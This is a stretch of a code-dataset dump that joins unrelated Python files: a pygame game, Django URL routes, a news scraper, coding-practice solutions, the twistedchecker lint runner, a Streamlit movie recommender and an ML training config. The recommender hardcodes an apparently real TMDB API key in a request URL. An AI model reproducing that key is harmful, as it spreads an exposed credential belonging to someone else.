time\nimport random\nfrom enemy import *\nfrom character import *\nfrom text import *\nfrom screen import *\nfrom color import *\n\nwinw = 800\nwinh = 600\n\nclass Game:\n\tdef __init__(self):\n\t\tpygame.init()\n\t\tself.clock = pygame.time.Clock()\n\t\tself.gamedisplay = pygame.display.set_mode((winw, winh))\n\t\tpygame.display.set_caption(\"Hopper\")\n\n\t\twith open('level.json') as file:\n\t\t\tself.data = json.load(file)\n\n\t\tself.fps \t = 60\n\t\tself.crashed = False\n\n\t\tself.keynone = tuple([0] * 323)\n\n\t\tself.t_empty = Text(self.gamedisplay, '')\n\t\tself.t_title = Text(self.gamedisplay, \"Hopper\", green, 100)\n\t\tself.t_over = Text(self.gamedisplay, 'Game Over', red, 80)\n\n\t\tself.t_play = Text(self.gamedisplay, 'C to play', yoffset=60)\n\t\tself.t_quit = Text(self.gamedisplay, 'Q to quit', yoffset=80)\n\t\tself.t_back = Text(self.gamedisplay, 'B to go back to the main menu', yoffset=100)\n\n\t\tself.s_main = Screen(self.gamedisplay, self.t_title, c=self.t_play, q=self.t_quit)\n\n\t\tself.player\t = Character(winw/2, winh/2)\n\t\tself.allsprites = pygame.sprite.Group()\n\n\tdef curve(self, currentlevel):\n\t\treturn (currentlevel**1.2) * 30\n\n\tdef quitgame(self):\n\t\tpygame.quit()\n\t\tquit()\n\n\tdef xbutton(self):\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tself.quitgame()\n\n\tdef run(self):\n\t\toutput = self.s_main.loop()\n\t\twhile True:\n\t\t\tself.level \t = 1\n\t\t\tself.tick\t = 0\n\t\t\tself.points = 0\n\t\t\tself.player.reset(winw/2, winh/2)\n\n\t\t\tself.allsprites = pygame.sprite.Group()\n\t\t\tself.allsprites.add(self.player)\n\n\t\t\tEnemy.reset(self.data[0])\n\t\t\n\t\t\tif output == pygame.K_q:\n\t\t\t\tself.quitgame()\n\n\t\t\texitcode = self.gameloop()\n\n\t\t\tif exitcode == 'quit':\n\t\t\t\tself.quitgame()\n\t\t\telif exitcode == 'dead':\n\t\t\t\toutput = self.gameover()\n\t\n\tdef gameover(self):\n\t\ts_gameover = Screen(self.gamedisplay, self.t_over, Text(self.gamedisplay, 'Level: ' + str(self.level), yoffset=20, ycenter=False), Text(self.gamedisplay, 'Score: ' + str(self.points), yoffset=40, ycenter=False),c=self.t_play, q=self.t_quit, b=self.t_back)\n\t\treturn s_gameover.loop()\n\n\tdef levelmanager(self):\n\t\tif self.points > self.curve(self.level):\n\t\t\tself.level += 1\n\t\t\tif len(self.data) >= self.level:\n\t\t\t\tEnemy.difficulty(self.data[self.level - 1])\n\t\t\t# later: Include infinite difficulty curve\n\n\tdef waitforrelease(self):\n\t\tpygame.event.pump()\n\t\tkey = pygame.key.get_pressed()\n\t\twhile not key == self.keynone:\n\t\t\tpygame.event.pump()\n\t\t\tkey = pygame.key.get_pressed()\n\t\t\tself.clock.tick(self.fps)\n\n\tdef gameloop(self):\n\t\twhile not self.crashed:\n\t\t\tself.xbutton()\n\n\t\t\t# Key Listeners\n\t\t\tkey = pygame.key.get_pressed()\n\t\t\tif key[pygame.K_q]:\n\t\t\t\tself.waitforrelease()\n\t\t\t\treturn 'quit'\n\t\t\telif key[pygame.K_p]:\n\t\t\t\tText(self.gamedisplay, '~ Paused ~', white, 60).displaytext()\n\t\t\t\tpygame.display.flip()\n\t\t\t\tself.waitforrelease()\n\t\t\t\tkey = pygame.key.get_pressed()\n\t\t\t\twhile not(key[pygame.K_p]):\n\t\t\t\t\tself.xbutton()\n\t\t\t\t\tkey = pygame.key.get_pressed()\n\t\t\t\tself.waitforrelease()\n\t\t\telse:\n\t\t\t\tself.player.update(key)\n\t\t\t\tEnemy.enemylist.update()\n\n\t\t\t# Collision Detection \n\t\t\tcollisions = pygame.sprite.spritecollide(self.player, Enemy.enemylist, True)\n\t\t\tif collisions:\n\t\t\t\treturn 'dead'\n\n\t\t\t# Enemy Spawning\n\t\t\tif self.tick > Enemy.spawnrate:\n\t\t\t\tself.tick = 0\n\t\t\t\tenemy = Enemy() # new enemy\n\t\t\t\tEnemy.enemylist.add(enemy)\n\t\t\t\tself.allsprites.add(enemy)\n\n\t\t\tself.tick += 1\n\n\t\t\tif self.tick % 10 == 0:\n\t\t\t\tself.points += 1\n\n\t\t\tself.levelmanager()\n\n\t\t\t# Display Clear\n\t\t\tself.gamedisplay.fill(black)\n\n\t\t\t# Draw all sprites\n\t\t\tself.allsprites.draw(self.gamedisplay)\n\n\t\t\t# Display Enemies\n\t\t\t#for e in Enemy.enemylist:\n\t\t\t#\tpygame.draw.rect(self.gamedisplay, e.color, e.display())\n\t\t\t#\tif e.iscolliding(self.player):\n\t\t\t#\t\treturn 'dead'\n\n\t\t\t# Display Floor\n\t\t\t#pygame.draw.rect(self.gamedisplay, white, [0, winh-95, winw, 4])\n\n\t\t\t# Display Text (last two temp)\n\t\t\tText(self.gamedisplay, 'Level: ' + str(self.level), white, ycenter=False, yoffset=20).displaytext()\n\t\t\tText(self.gamedisplay, 'Score: ' + str(self.points), white, ycenter=False, yoffset=40).displaytext()\n\t\t\tText(self.gamedisplay, 'Spawn Rate: ' + str(Enemy.spawnrate), white, ycenter=False, yoffset=60).displaytext()\n\t\t\tText(self.gamedisplay, 'Direction: ' + str(Enemy.direction), white, ycenter=False, yoffset=80).displaytext()\n\n\t\t\t# Update and tick @ 60fps\n\t\t\tpygame.display.flip()\n\t\t\tself.clock.tick(self.fps)\n","repo_name":"RitikShah/hopper","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"27797632274","text":"from django.urls import path\nfrom rest_framework_jwt import views as jwt_views\n\nfrom. import views\n\nurlpatterns = [\n path('api/token/', jwt_views.obtain_jwt_token, name='token_obtain_pair'),\n path('api/token/refresh/', jwt_views.refresh_jwt_token, name='token_refresh'),\n path('api/token/verify/', jwt_views.verify_jwt_token, name='token_refresh'),\n path('all/', views.UserList.as_view()),\n path('user/', views.OwnUserRUD.as_view()),\n path('register/', views.CreateUser.as_view()),\n path('check-username/', views.CheckUsername.as_view()),\n path('check-email/', views.CheckEmail.as_view()),\n path('add-favourite/', views.AddFavourite.as_view()),\n path('favourites/', views.Favourites.as_view()),\n]\n","repo_name":"Arihtev/DiplomaBE","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"16278796596","text":"# -*- coding: utf-8 -*-\n\"\"\"\n-------------------------------------------------\n File: techweb.py\n Desc: TechWeb(http://www.techweb.com.cn/)\n Author: CoderPig\n Date: 2019/3/27 0027 20:41\n-------------------------------------------------\n\"\"\"\nfrom news import News, MongodbClient\nfrom tools import user_agents, str_handle\nimport requests as r\nfrom pyquery import PyQuery\n\nindex_url = 'http://www.techweb.com.cn/'\nroll_url = index_url + 'roll/'\nheaders = {\n 'User-Agent': user_agents.random_user_agent(),\n 'Host': str_handle.remove_url_scheme(index_url)[:-1],\n 'Referer': roll_url,\n}\n\n\ndef fetch_news():\n news_list = []\n resp = r.get(roll_url, headers=headers)\n print(\"爬取:%s\" % resp.url)\n if resp is not None:\n resp.encoding = 'utf8'\n pq = PyQuery(resp.text)\n lis = pq('div.newslist > ul >li')\n for li in lis.items():\n if li.attr('class') != 'line':\n a = li('span.tit > a')\n news_list.append(News(\n _id=a.attr('href').split('/')[-1].replace('.shtml', ''),\n url=a.attr('href'),\n title=a.text(),\n origin=li('span.column').text() + '|' + li('span.source').text(),\n update_time=li('span.time').text()\n ).to_dict())\n return news_list\n\n\nif __name__ == '__main__':\n client = MongodbClient('techweb')\n client.insert_many(fetch_news())\n print(\"techweb爬取完毕!\")\n","repo_name":"coder-pig/CPInfoSource-Spider","sub_path":"news/internet/techweb.py","file_name":"techweb.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"34"} +{"seq_id":"15739828277","text":"#\n# @lc app=leetcode.cn id=23 lang=python\n#\n# [23] 合并K个升序链表\n#\n\n# @lc code=start\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution(object):\n def mergeKLists(self, lists):\n \"\"\"\n :type lists: List[ListNode]\n :rtype: ListNode\n \"\"\"\n def mergeTwoList(list1, list2):\n dummy = ListNode(0)\n res = dummy\n while list1 is not None and list2 is not None:\n if list1.val < list2.val:\n dummy.next = list1\n list1 = list1.next\n else:\n dummy.next = list2\n list2 = list2.next\n dummy = dummy.next\n if list1 is not None:\n dummy.next = list1\n elif list2 is not None:\n dummy.next = list2\n return res.next\n \n if len(lists) == 0:\n return None\n \n if len(lists) == 1:\n return lists[0]\n \n i = 0\n tmp = []\n for i in range(0, len(lists) - 1, 2):\n tmp.append(mergeTwoList(lists[i], lists[i + 1]))\n # 处理奇数\n if i + 2 != len(lists):\n tmp.append(lists[-1])\n return self.mergeKLists(tmp)\n# @lc code=end\n\n","repo_name":"GardianT/leetcode-training","sub_path":"23.合并k个升序链表.py","file_name":"23.合并k个升序链表.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"233328352","text":"import sys\nimport os\nimport re\n\nfrom astroid.modutils import file_from_modpath\nfrom pylint.checkers.base import NameChecker\nfrom pylint.lint import PyLinter\n\nfrom twisted.python.compat import NativeStringIO\n\nimport twistedchecker\nfrom twistedchecker.checkers import patch_pylint_format\nfrom twistedchecker.core.exceptionfinder import findAllExceptions\nfrom twistedchecker.reporters.limited import LimitedReporter\n\n\nclass Runner():\n \"\"\"\n Run and control the checking process.\n \"\"\"\n outputStream = None\n linter = None\n allowOptions = None\n # Customized checkers.\n checkers = (\"header.HeaderChecker\",\n \"names.TwistedNamesChecker\",\n \"docstring.DocstringChecker\",\n \"formattingoperation.FormattingOperationChecker\",\n \"comment.CommentChecker\",\n \"testclassname.TestClassNameChecker\")\n allowedMessagesFromPylint = (\"F0001\",\n \"C0103\",\n \"C0301\",\n \"W0311\",\n \"W0312\")\n diffOption = None\n errorResultRead = \"Error: Failed to read result file '%s'.\\n\"\n prefixModuleName = \"************* Module \"\n regexLineStart = \"^[WCEFR]\\d{4}\\:\"\n\n def __init__(self):\n \"\"\"\n Initialize C{PyLinter} object, and load configuration file.\n \"\"\"\n self.allowOptions = True\n self.linter = PyLinter(self._makeOptions())\n # register standard checkers.\n self.linter.load_default_plugins()\n # read configuration.\n pathConfig = os.path.join(twistedchecker.abspath,\n \"configuration\", \"pylintrc\")\n self.linter.read_config_file(pathConfig)\n # now we can load file config and command line, plugins (which can\n # provide options) have been registered.\n self.linter.load_config_file()\n allowedMessages = self.registerCheckers()\n # disable messages\n disabledMessages = set(self.linter\n .cfgfile_parser.get(\"TWISTEDCHECKER\", \"disable\")\n .replace(\" \", \"\").split(\",\"))\n if disabledMessages != {\"\"}:\n for msg in disabledMessages:\n self.linter.disable(msg)\n allowedMessages -= disabledMessages\n # set default output stream to stdout\n self.setOutput(sys.stdout)\n # set default reporter to limited reporter\n self.linter.set_reporter(LimitedReporter(allowedMessages))\n\n\n def _makeOptions(self):\n \"\"\"\n Return options for twistedchecker.\n \"\"\"\n return (\n (\"diff\",\n {\"type\": \"string\",\n \"metavar\": \"\",\n \"help\": \"Set comparing result file to automatically \"\n \"generate a diff.\"}\n ),\n ('pep8',\n {'type': 'yn', 'metavar': '',\n 'default': False,\n 'help': 'Show pep8 warnings.'}\n ),\n ('strict-epydoc',\n {'type': 'yn', 'metavar': '',\n 'default': False,\n 'help': \"Check '@type' and '@rtype' in epydoc.\"}\n ),\n )\n\n\n def setOutput(self, stream):\n \"\"\"\n Set the stream to output result of checking.\n\n @param stream: output stream, defaultly it should be stdout\n \"\"\"\n self.outputStream = stream\n sys.stdout = stream\n\n\n def displayHelp(self):\n \"\"\"\n Output help message of twistedchecker.\n \"\"\"\n self.outputStream.write(self.linter.help())\n sys.exit(32)\n\n\n def registerCheckers(self):\n \"\"\"\n Register all checkers of TwistedChecker to C{PyLinter}.\n\n @return: a list of allowed messages\n \"\"\"\n # We patch the default pylint format checker.\n patch_pylint_format.patch()\n\n # register checkers\n allowedMessages = list(self.allowedMessagesFromPylint)\n for strChecker in self.checkers:\n modname, classname = strChecker.split(\".\")\n strModule = \"twistedchecker.checkers.%s\" % modname\n checker = getattr(__import__(strModule,\n fromlist=[\"twistedchecker.checkers\"]),\n classname)\n instanceChecker = checker(self.linter)\n allowedMessages += list(instanceChecker.msgs.keys())\n self.linter.register_checker(instanceChecker)\n\n self.restrictCheckers(allowedMessages)\n return set(allowedMessages)\n\n\n def unregisterChecker(self, checker):\n \"\"\"\n Remove a checker from the list of registered checkers.\n\n @param checker: the checker to remove\n \"\"\"\n self.linter._checkers[checker.name].remove(checker)\n if checker in self.linter._reports:\n del self.linter._reports[checker]\n if checker in self.linter.options_providers:\n self.linter.options_providers.remove(checker)\n\n\n def findUselessCheckers(self, allowedMessages):\n \"\"\"\n Find checkers which generate no allowed messages.\n\n @param allowedMessages: allowed messages\n @return: useless checkers, remove them from pylint\n \"\"\"\n uselessCheckers = []\n for checkerName in self.linter._checkers:\n for checker in list(self.linter._checkers[checkerName]):\n messagesOfChecker = set(checker.msgs)\n if not messagesOfChecker.intersection(allowedMessages):\n uselessCheckers.append(checker)\n return uselessCheckers\n\n\n def restrictCheckers(self, allowedMessages):\n \"\"\"\n Unregister useless checkers to speed up twistedchecker.\n\n @param allowedMessages: output messages allowed in twistedchecker\n \"\"\"\n uselessCheckers = self.findUselessCheckers(allowedMessages)\n # Unregister these checkers\n for checker in uselessCheckers:\n self.unregisterChecker(checker)\n\n\n def getCheckerByName(self, checkerType):\n \"\"\"\n Get checker by given name.\n\n @checkerType: type of the checker\n \"\"\"\n for checker in sum(list(self.linter._checkers.values()), []):\n if isinstance(checker, checkerType):\n return checker\n return None\n\n\n def allowPatternsForNameChecking(self, patternsFunc, patternsClass):\n \"\"\"\n Allow name exceptions by given patterns.\n\n @param patternsFunc: patterns of special function names\n @param patternsClass: patterns of special class names\n \"\"\"\n cfgParser = self.linter.cfgfile_parser\n nameChecker = self.getCheckerByName(NameChecker)\n if not nameChecker:\n return\n if patternsFunc:\n regexFuncAdd = \"|((%s).+)$\" % \"|\".join(patternsFunc)\n else:\n regexFuncAdd = \"\"\n if patternsClass:\n regexClassAdd = \"|((%s).+)$\" % \"|\".join(patternsClass)\n else:\n regexClassAdd = \"\"\n # Modify regex for function, method and class name.\n regexMethod = cfgParser.get(\"BASIC\", \"method-rgx\") + regexFuncAdd\n regexFunction = cfgParser.get(\"BASIC\", \"function-rgx\") + regexFuncAdd\n regexClass = cfgParser.get(\"BASIC\", \"class-rgx\") + regexClassAdd\n # Save to config parser.\n cfgParser.set(\"BASIC\", \"method-rgx\", regexMethod)\n cfgParser.set(\"BASIC\", \"function-rgx\", regexFunction)\n cfgParser.set(\"BASIC\", \"class-rgx\", regexClass)\n # Save to name checker.\n nameChecker.config.method_rgx = re.compile(regexMethod)\n nameChecker.config.function_rgx = re.compile(regexFunction)\n nameChecker.config.class_rgx = re.compile(regexClass)\n\n\n def getPathList(self, filesOrModules):\n \"\"\"\n Transform a list of modules to path.\n\n @param filesOrModules: a list of modules (may be foo/bar.py or\n foo.bar)\n \"\"\"\n pathList = []\n for fileOrMod in filesOrModules:\n if not os.path.exists(fileOrMod):\n # May be given module is not not a path,\n # then transform it to a path.\n try:\n filepath = file_from_modpath(fileOrMod.split('.'))\n except (ImportError, SyntaxError):\n # Could not load this module.\n continue\n if not os.path.exists(filepath):\n # Could not find this module in file system.\n continue\n if os.path.basename(filepath) == \"__init__.py\":\n filepath = os.path.dirname(filepath)\n else:\n filepath = fileOrMod\n pathList.append(filepath)\n return pathList\n\n\n def setNameExceptions(self, filesOrModules):\n \"\"\"\n Find name exceptions in codes and allow them to be ignored\n in checking.\n\n @param filesOrModules: a list of modules (may be foo/bar.py or\n foo.bar)\n \"\"\"\n pathList = self.getPathList(filesOrModules)\n for path in pathList:\n patternsFunc, patternsClass = findAllExceptions(path)\n self.allowPatternsForNameChecking(patternsFunc, patternsClass)\n\n\n def run(self, args):\n \"\"\"\n Setup the environment, and run pylint.\n\n @param args: arguments will be passed to pylint\n @type args: list of string\n \"\"\"\n # set output stream.\n if self.outputStream:\n self.linter.reporter.set_output(self.outputStream)\n try:\n args = self.linter.load_command_line_configuration(args)\n except SystemExit as exc:\n if exc.code == 2: # bad options\n exc.code = 32\n raise\n if not args:\n self.displayHelp()\n # Check for 'strict-epydoc' option.\n if self.allowOptions and not self.linter.option_value(\"strict-epydoc\"):\n for msg in [\"W9203\", \"W9205\"]:\n self.linter.disable(msg)\n\n # insert current working directory to the python path to have a correct\n # behaviour.\n sys.path.insert(0, os.getcwd())\n # set exceptions for name checking.\n self.setNameExceptions(args)\n\n # check for diff option.\n self.diffOption = self.linter.option_value(\"diff\")\n if self.diffOption:\n self.prepareDiff()\n\n # check codes.\n self.linter.check(args)\n\n # show diff of warnings if diff option on.\n if self.diffOption:\n diffCount = self.showDiffResults()\n exitCode = 1 if diffCount else 0\n sys.exit(exitCode)\n\n sys.exit(self.linter.msg_status)\n\n\n def prepareDiff(self):\n \"\"\"\n Prepare to run the checker and get diff results.\n \"\"\"\n self.streamForDiff = NativeStringIO()\n self.linter.reporter.set_output(self.streamForDiff)\n\n\n def showDiffResults(self):\n \"\"\"\n Show results when diff option on.\n \"\"\"\n try:\n oldWarnings = self.parseWarnings(self._readDiffFile())\n except:\n sys.stderr.write(self.errorResultRead % self.diffOption)\n return 1\n\n newWarnings = self.parseWarnings(self.streamForDiff.getvalue())\n\n diffWarnings = self.generateDiff(oldWarnings, newWarnings)\n\n if diffWarnings:\n diffResult = self.formatWarnings(diffWarnings)\n self.outputStream.write(diffResult + \"\\n\")\n return len(diffWarnings)\n else:\n return 0\n\n def _readDiffFile(self):\n \"\"\"\n Read content of diff file.\n\n This is here to help with testing.\n\n @return: File content.\n @rtype: c{str}\n \"\"\"\n with open(self.diffOption) as f:\n content = f.read()\n return content\n\n def generateDiff(self, oldWarnings, newWarnings):\n \"\"\"\n Generate diff between given two lists of warnings.\n\n @param oldWarnings: parsed old warnings\n @param newWarnings: parsed new warnings\n @return: a dict object of diff\n \"\"\"\n diffWarnings = {}\n\n for modulename in newWarnings:\n diffInModule = (\n newWarnings[modulename] -\n oldWarnings.get(modulename, set()))\n if diffInModule:\n diffWarnings[modulename] = diffInModule\n\n return diffWarnings\n\n\n def parseWarnings(self, result):\n \"\"\"\n Transform result in string to a dict object.\n\n @param result: a list of warnings in string\n @return: a dict of warnings\n \"\"\"\n warnings = {}\n currentModule = None\n warningsCurrentModule = []\n for line in result.splitlines():\n if line.startswith(self.prefixModuleName):\n # Save results for previous module\n if currentModule:\n warnings[currentModule] = set(warningsCurrentModule)\n # Initial results for current module\n moduleName = line.replace(self.prefixModuleName, \"\")\n currentModule = moduleName\n warningsCurrentModule = []\n elif re.search(self.regexLineStart, line):\n warningsCurrentModule.append(line)\n else:\n if warningsCurrentModule:\n warningsCurrentModule[-1] += \"\\n\" + line\n # Save warnings for last module\n if currentModule:\n warnings[currentModule] = set(warningsCurrentModule)\n return warnings\n\n\n def formatWarnings(self, warnings):\n \"\"\"\n Format warnings to a list of results.\n\n @param warnings: a dict of warnings produced by parseWarnings\n @return: a list of warnings in string\n \"\"\"\n lines = []\n for modulename in sorted(warnings):\n lines.append(self.prefixModuleName + modulename)\n lines.extend(sorted(warnings[modulename],\n key=lambda x: x.split(\":\")[1]))\n\n return \"\\n\".join(lines)\n\n\ndef main():\n \"\"\"\n An entry point used in the setup.py to create a runnable script.\n \"\"\"\n runner = Runner()\n runner.run(sys.argv[1:])\n","repo_name":"twisted/twistedchecker","sub_path":"twistedchecker/core/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":14206,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"18"} +{"seq_id":"24265069955","text":"import streamlit as st\nimport pickle\nimport pandas as pd\nimport requests\n\nmovies_dict = pickle.load(open('model/movie_dict.pkl','rb'))\nmovies = pd.DataFrame(movies_dict)\n\nsimilarity = pickle.load(open('model/similarity.pkl','rb'))\n\n\n\ntry:\n def fetch_poster(movie_id):\n url = \"https://api.themoviedb.org/3/movie/{}?api_key=8265bd1679663a7ea12ac168da84d2e8&language=en-US\".format(movie_id)\n data = requests.get(url)\n data = data.json()\n poster_path = data['poster_path']\n full_path = \"https://image.tmdb.org/t/p/w500/\" + poster_path\n return full_path\n\n def recommend(movie):\n movie_index = movies[movies['title']==movie].index[0]\n distances = similarity[movie_index]\n movies_list=sorted(list(enumerate(distances)), reverse=True, key=lambda x:x[1])[1:6]\n recommended_movies = []\n recommended_movies_posters =[]\n for i in movies_list:\n movie_id =movies.iloc[i[0]].movie_id\n recommended_movies.append(movies.iloc[i[0]].title)\n\n # fetch poster from API\n recommended_movies_posters.append(fetch_poster(movie_id))\n return recommended_movies, recommended_movies_posters\n\n st.header('Movie Recommender System ')\n selected_movie_name =st.selectbox(\n 'mr_pankajpandey_',\n movies['title'].values)\n\n if st.button('Recommend'):\n names, posters = recommend(selected_movie_name)\n col1, col2, col3, col4, col5 = st.columns(5)\n with col1:\n st.text(names[0])\n st.image(posters[0])\n with col2:\n st.text(names[1])\n st.image(posters[1])\n\n with col3:\n st.text(names[2])\n st.image(posters[2])\n with col4:\n st.text(names[3])\n st.image(posters[3])\n with col5:\n st.text(names[4])\n st.image(posters[4])\n st.divider()\n\nexcept:\n st.warning('API Error ', icon=\"⚠️\")\nhtml_string = \"

    Made with @mrpankajpandey_


    Github account :- mrpankajpandey\"\nst.markdown(html_string, unsafe_allow_html=True)","repo_name":"mrpankajpandey/movie-recommender-system-ML","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"29975915739","text":"import string\nimport random\n\ncommon = {\n \"exp_name\": \"duie2\", # ace05_lu\n \"rel2id\": \"rel2id.json\",\n \"ent2id\": \"ent2id.json\",\n \"device_num\": 1,\n# \"encoder\": \"BiLSTM\",\n \"encoder\": \"BERT\", \n \"hyper_parameters\": {\n \"shaking_type\": \"cln_plus\",\n \"inner_enc_type\": \"lstm\",\n # match_pattern: only_head_text (nyt_star, webnlg_star), whole_text (nyt, webnlg), only_head_index, whole_span, event_extraction\n \"match_pattern\": \"whole_text\", \n },\n}\ncommon[\"run_name\"] = \"{}+{}+{}\".format(\"TP2\", common[\"hyper_parameters\"][\"shaking_type\"], common[\"encoder\"]) + \"\"\n\nrun_id = ''.join(random.sample(string.ascii_letters + string.digits, 8))\ntrain_config = {\n \"train_data\": \"train_data.json\",\n \"valid_data\": \"valid_data.json\",\n \"rel2id\": \"rel2id.json\",\n \"logger\": \"wandb\", # if wandb, comment the following four lines\n \n# # if logger is set as default, uncomment the following four lines and comment the line above\n# \"logger\": \"default\", \n# \"run_id\": run_id,\n# \"log_path\": \"./default_log_dir/default.log\",\n# \"path_to_save_model\": \"./default_log_dir/{}\".format(run_id),\n\n # when to save the model state dict\n \"f1_2_save\": 0,\n # whether train_config from scratch\n \"fr_scratch\": True,\n # write down notes here if you want, it will be logged\n \"note\": \"start from scratch\",\n # if not fr scratch, set a model_state_dict\n \"model_state_dict_path\": \"\", # valid only if \"fr_scratch\" is False\n \"hyper_parameters\": {\n \"batch_size\": 32,\n \"epochs\": 100,\n \"seed\": 2333,\n \"log_interval\": 10,\n \"max_seq_len\": 128,\n \"sliding_len\": 20,\n \"scheduler\": \"CAWR\", # Step\n \"ghm\": False, # set True if you want to use GHM to adjust the weights of gradients, this will speed up the training process and might improve the results. (Note that ghm in current version is unstable now, may hurt the results)\n \"tok_pair_sample_rate\": 1, # (0, 1] How many percent of token paris you want to sample for training, this would slow down the training if set to less than 1. It is only helpful when your GPU memory is not enought for the training.\n },\n}\n\neval_config = {\n \"model_state_dict_dir\": \"./wandb\", # if use wandb, set \"./wandb\", or set \"./default_log_dir\" if you use default logger\n \"run_ids\": [\"1a70p109\", ],\n \"last_k_model\": 1,\n \"test_data\": \"*test*.json\", # \"*test*.json\"\n \n # results\n \"save_res\": False,\n \"save_res_dir\": \"../results\",\n \n # score: set true only if test set is tagged\n \"score\": True,\n \n \"hyper_parameters\": {\n \"batch_size\": 32,\n \"force_split\": False,\n \"max_seq_len\": 512,\n \"sliding_len\": 50,\n },\n}\n\nbert_config = {\n \"data_home\": \"../data4bert\",\n \"bert_path\": \"../../pretrained_models/chinese-bert-wwm-ext-hit\", # bert-base-cased, chinese-bert-wwm-ext-hit\n \"hyper_parameters\": {\n \"lr\": 5e-5,\n },\n}\nbilstm_config = {\n \"data_home\": \"../data4bilstm\",\n \"token2idx\": \"token2idx.json\",\n \"pretrained_word_embedding_path\": \"../../pretrained_emb/glove_300_nyt.emb\",\n \"hyper_parameters\": {\n \"lr\": 1e-3,\n \"enc_hidden_size\": 300,\n \"dec_hidden_size\": 600,\n \"emb_dropout\": 0.1,\n \"rnn_dropout\": 0.1,\n \"word_embedding_dim\": 300,\n },\n}\n\ncawr_scheduler = {\n # CosineAnnealingWarmRestarts\n \"T_mult\": 1,\n \"rewarm_epoch_num\": 2,\n}\nstep_scheduler = {\n # StepLR\n \"decay_rate\": 0.999,\n \"decay_steps\": 100,\n}\n\n# ---------------------------dicts above is all you need to set---------------------------------------------------\nif common[\"encoder\"] == \"BERT\":\n hyper_params = {**common[\"hyper_parameters\"], **bert_config[\"hyper_parameters\"]}\n common = {**common, **bert_config}\n common[\"hyper_parameters\"] = hyper_params\nelif common[\"encoder\"] == \"BiLSTM\":\n hyper_params = {**common[\"hyper_parameters\"], **bilstm_config[\"hyper_parameters\"]}\n common = {**common, **bilstm_config}\n common[\"hyper_parameters\"] = hyper_params\n \nhyper_params = {**common[\"hyper_parameters\"], **train_config[\"hyper_parameters\"]}\ntrain_config = {**train_config, **common}\ntrain_config[\"hyper_parameters\"] = hyper_params\nif train_config[\"hyper_parameters\"][\"scheduler\"] == \"CAWR\":\n train_config[\"hyper_parameters\"] = {**train_config[\"hyper_parameters\"], **cawr_scheduler}\nelif train_config[\"hyper_parameters\"][\"scheduler\"] == \"Step\":\n train_config[\"hyper_parameters\"] = {**train_config[\"hyper_parameters\"], **step_scheduler}\n \nhyper_params = {**common[\"hyper_parameters\"], **eval_config[\"hyper_parameters\"]}\neval_config = {**eval_config, **common}\neval_config[\"hyper_parameters\"] = hyper_params","repo_name":"131250208/TPlinker-joint-extraction","sub_path":"tplinker_plus/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","stars":416,"dataset":"github-code","pt":"18"} +{"seq_id":"70578845159","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\n\nfrom code.shared_functions import skip_echo\n\ndef display():\n c1, c2 = st.columns([9,1])\n c1.title(\"Un ejemplo simple\")\n show_code = c2.checkbox(\"Código\")\n\n with st.echo(\"above\") if show_code else skip_echo():\n c1, c2 = st.columns([4, 6])\n # Columna izquierda\n with c1:\n st.image(\"images/ejemplo_simple.png\")\n # Columna derecha\n with c2:\n st.markdown(\"## Pregunta #1\")\n st.markdown(\"### ¿Cómo harían una página web que:\")\n st.markdown(f\"#### {' '*5} permitiera cargar una foto, \")\n st.markdown(f\"#### {' '*10} la convirtiera a escala de grises, \")\n st.markdown(f\"#### {' '*15} mostrara la imagen resultante,\")\n st.markdown(f\"#### {' '*20} y permitiera descargarla?\")\n st.markdown(\"\")\n st.markdown(\"## Pregunta #2\")\n st.markdown(\"#### ¿Cuántas líneas de código creen que debería tomar eso?\")\n","repo_name":"sebastiandres/talk_2021_11_pyconcl","sub_path":"slides/slide_10_ejemplo_webapp_simple.py","file_name":"slide_10_ejemplo_webapp_simple.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"es","doc_type":"code","stars":10,"dataset":"github-code","pt":"18"} +{"seq_id":"19078112590","text":"#User function Template for python3\r\n\r\n\r\n\r\nclass Solution:\r\n def arranged(self,a,n):\r\n \r\n possitive_list = []\r\n negative_list = []\r\n \r\n for i in a:\r\n if i >= 0:\r\n possitive_list.append(i)\r\n else:\r\n negative_list.append(i)\r\n \r\n new_arr = []\r\n \r\n for j in range(len(possitive_list)):\r\n new_arr.append(possitive_list[j])\r\n new_arr.append(negative_list[j])\r\n \r\n a[:] = new_arr\r\n return new_arr\r\n \r\n \r\n \r\n\r\n\r\n#{ \r\n # Driver Code Starts\r\n#Initial Template for Python 3\r\n\r\n\r\n\r\nt=int(input())\r\nfor _ in range(0,t):\r\n n=int(input())\r\n a=list(map(int,input().split()))\r\n ans=Solution().arranged(a,n)\r\n print(*ans)\r\n\r\n# } Driver Code Ends\r\n","repo_name":"AshwinHarishP/GeeksforGeeks","sub_path":"Python Coding Practice/Positive and negative element.py","file_name":"Positive and negative element.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"9402360135","text":"import typer\n\nfrom src.database_commander import DatabaseCommander\nfrom src.logger_handler import LoggerHandler\n\n_logger = LoggerHandler(\"clear_module\")\n\n\ndef clear_local_database():\n \"\"\"Removes the recipes, ingredients, links between them as well as entered bottles\"\"\"\n typer.confirm(\n \"Delete local Database Data? This includes recipes and ingredients. A backup will be created before deletion.\",\n abort=True\n )\n local_db = DatabaseCommander()\n 